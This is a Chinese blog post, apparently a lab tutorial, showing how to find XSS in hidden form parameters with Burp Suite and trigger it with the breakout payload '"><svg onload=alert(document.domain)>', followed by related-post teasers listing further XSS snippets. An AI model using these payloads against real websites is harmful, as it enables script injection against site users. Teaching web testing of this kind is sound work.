【安全】P 4-8 隐藏提交参数中的XSS

最新推荐文章于 2023-01-10 08:00:31 发布
最新推荐文章于 2023-01-10 08:00:31 发布
阅读量229 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113839708
版权

0X01 HTML表单隐藏参数介绍

隐藏域是用来收集或发送信息的不可见元素,对于网页的访问者来说,隐藏域是看不见的。当表单被提交时,隐藏域就会将信息用你设置时定义的名称和值发送到服务器上。

代码格式:

<input type="hidden" name="..." value="...">

在这里插入图片描述

0X02 Burpsuite抓包测试

使用Burpsutie进行抓包,截取提交的HTTP请求。
在这里插入图片描述

0X03 HTML中svg介绍

SVG 意为可缩放矢量图形(Scalable Vector Graphics)。
SVG 使用 XML 格式定义图像。
SVG 文件可通过以下标签嵌入 HTML 文档:、 或者 。
也可以使用svg标签插入。
<svg/事件=””>

0X04 闭合触发XSS

"><svg onload=alert(document.domain)>%0a 

在这里插入图片描述
在这里插入图片描述

----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
2021-11-15-xss-labs上
qq_50963064的博客
11-15 298
xss-labs靶场安装 首先还是要有phpstudy,这个就不说了。 然后下载靶场: 地址:https://github.com/do0dl3/xss-labs 将靶场解压到phpstudy的www目录下,访问就好了。 xss-labs 1~10 level-01 根据图标点击进入xss之旅: 可以看到有get请求,参数为name,可进行输入,并将输入内容显示于页面。 http://127.0.0.1/xss-labs-master/level1.php?name=test 可以看到这里的输入内容
隐藏参数XSS
qq_43776408的博客
07-29 633
HTML表单隐藏 burp抓包测试 抓包发现 即便是hidden属性的值 在抓到包之后也能看到值 值为hackme 第四关 第四关的题和第三关表面看一样 HTML的svg介绍 闭合触发XSS 第一个双引号是为了闭合前面的引号 %0a个人感觉是换行的 感觉和下面的和svg没关系啊 你直接找hidden 找打了hidden就用这一篇讲的方法 你可以现在burp对p1和p2参数进行测试 直接写入代码 发现不行 第三关对p1参测试不可以 但是第三关对p2参数测试可以 现在是对p1和p2测试都不可以 都把
关于form表单提交什么隐藏属性也可以提交数据
LzwGlory的专栏
01-26 1169
formvisibility=hidden的和display=none的表单元素都会随表单提交, 只有disabled=true的元素不随表单提交
隐藏表单提交参数
TjeCodeBear的博客
11-27 2952
&lt;input type="hidden" name="id" value="001"&gt; request获取IP地址 request.getRemoteAddr(); 还有一种方式就是readOnly
xss靶场10-14】见参数就插:寻找隐藏参数、各种属性
07-17 472
XSS-参数
JS如何使用隐藏控件为表单添加参数
最新发布
itclanCoder
01-10 242
前言在一些前端动态网页的表单里,并不是所有的参数都需要填写或选择,有些需要隐藏起来,然后跟着小单一起提交传递给后台,发送到服务器端那这个是怎么实现的呢示例展示具体示例,可见https://coder.itclan.cn/fontend/js/24-hide-input-params/点击文末左下方阅读原文即可体验01原生js对于不显示在界面上的元素,但在提交表单时,却又要携带上去,是有这种需求的,...
xss-labs-master靶机1-20关解题思路
qq_41734243的博客
05-09 7270
xss-labs-master第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关 xss-labs-master有二十关 在这篇文章,默认读者已有WEB渗透测试相关知识,以及PHP、HTML等相关知识。 第一关 a、后台代码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta ht...
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 955
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
网络安全】——客户端安全(浏览器安全XSS、CSRF、Clickjacking)
Veeupup博客
04-12 607
学习总结客户端安全的相关要素,包括浏览器安全,跨站脚本攻击(XSS),跨站点请求伪造(CSRF),点击劫持(Clickjacking),HTML5安全等。
form表单与fiddler抓包
认知 行动 坚持
09-16 9739
看一段简单的html代码:        点击Submit, 抓到的包是:
DVWA--XSS (Reflected)
When you collect everything, you understand nothing.
09-08 292
本文记录一次在DVWA漏洞平台的如何利用三种类型的XSS,并利用其获取该平台登陆Cookie的实验。 0x00 测试环境: DVWA:Win 7虚拟机,phpstudy搭建DVWA,存在XSS漏洞的网站;|IP: 192.168.124.6| 主机A:Win 7物理机,开启phpstudy,攻击者;|IP:192.168.124.2| 0x01 反射型XSS 1、Low级别: PHP源代码...
XSS跨站脚本攻击(level1-10)
不知名白帽的博客
05-31 2384
XSS(跨站请求伪造)level1-10关的题目讲解。
Hidden属性的input标签XSS的触发方法
热门推荐
CC's Blog
03-31 1万+
今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:<input type="hidden" name="returnurl" value="[USER INJECT]" />正常情况下的XSS应当是: http://victim/?value=” onclick=”alert(document.domain) 但是这里由于该input 未在页面显示,常用
xss漏洞简析(干货)
Haowill的博客
06-23 4986
xss漏洞 获取cookie: 指向其他url: HTML事件触发XSS:<svg onload/οnclick=“alert(document.domain);”> javascript伪协议:javascript:alert(document.domain); 列: xss漏洞介绍 跨站脚本攻击(cross site scripting),缩写xss 恶意攻击者往web页面里插入script代码,当用户浏览该页面时,嵌入到其web页面的script代码就会执行,从而达到恶意攻击者攻击用
xss攻击-面向前端的安全攻击 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
02-28 1340
文章目录
不可见(hidden)input标签触发XSS
weixin_33963594的博客
12-29 1185
在寻找XSS的过程,会发现从POST或者URL参数拿到INPUT存放,但这些input都是hidden不可见的,通过F12调试,查看构造出来的代码确实存在点击事件,但是总是触发不了 通过网上查询资料,最总找到使用一个比较高级一点属性accesskey=""来触发不可见标签事件,accesskey是HTML语言标签的一个全局属性 <input type="hidden" name="...
Web安全:XSS
坚持硬核
02-25 394
0x00 浏览器解析网页的过程: 0x01如何检测是否存在xss? 从开发的角度去理解:xss = echo + $_GET/$_POST/$_REQUEST 所以凡是页面存在用户可以提交数据,并且数据可以回显的功能模块。开发者就有可能忘记在回显前过滤,使得功能模块存在xss漏洞。可以通过提交 <script>alert('xss');</script>来进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值